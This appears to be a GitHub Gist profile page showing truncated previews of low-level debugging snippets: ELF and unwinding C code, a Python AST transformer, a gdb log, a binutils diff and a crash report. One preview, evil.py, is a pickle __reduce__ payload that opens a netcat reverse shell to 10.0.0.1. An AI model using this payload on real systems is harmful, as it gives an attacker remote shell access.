Skip to content

Instantly share code, notes, and snippets.

View pablogsal's full-sized avatar

Pablo Galindo Salgado pablogsal

View GitHub Profile
#include <elf.h>
#include <execinfo.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#define UNW_LOCAL_ONLY
#include <libunwind.h>
// AArch64 registers
#include <elf.h>
#include <execinfo.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
import ast
class ComparisonTransformer(ast.NodeTransformer):
def visit_Compare(self, node):
self.generic_visit(node)
if len(node.ops) == 1 and len(node.comparators) == 1:
return self.transform_single_comparison(node)
else:
Attaching and calling dlopen fails:
```
(gdb) call (void*)dlopen(0, 2) │>>> test test_exceptions failed -- Traceback (most recent call last):
Couldn't write extended state status: Bad address. │ File "/opt/_internal/cpython-3.8.13/lib/python3.8/test/test_exceptions.py", line 1256, in test_memory_error_in_PyErr_PrintEx
An error occurred while in a function called from GDB. │ rc, out, err = script_helper.assert_python_failure("-c", code % i)
Evaluation of the expression containing the function │ File "/opt/_internal/cpython-3.8.13/lib/python3.8/test/support/script_helper.py", line 167, in assert_python_failure
(dlopen@plt) will be abandoned.
#include <iostream>
#include <string>
#include <vector>
#include <stdexcept>
#include <elfutils/libdw.h>
#include <elfutils/libdwfl.h>
#include <dwarf.h>
#include <fcntl.h>
#include <unistd.h>
diff --git a/bfd/elf.c b/bfd/elf.c
index 84a5d94281..a0bd5203f5 100644
--- a/bfd/elf.c
+++ b/bfd/elf.c
@@ -5943,6 +5943,11 @@ assign_file_positions_for_load_sections (bfd *abfd,
link_info->callbacks->info ("%X");
}
+ /* If we have a PT_LOAD segment with no sections that is empty,
+ then we need to drop it or some loaders will complain. */
#include <fcntl.h>
#include <gelf.h>
#include <libelf.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
@pablogsal
pablogsal / evil.py
Created October 23, 2023 08:46
evil.py
import pickle
import base64
import os
class Evil:
def __reduce__(self):
cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f')
return os.system, (cmd,)
if __name__ == '__main__':
Process: a.out [63465]
Path: /Users/USER/*/a.out
Load Address: 0x100000000
Identifier: a.out
Version: ???
Code Type: ARM64
Platform: macOS
Parent Process: debugserver [63466]
Date/Time: 2023-06-14 18:19:15.597 +0100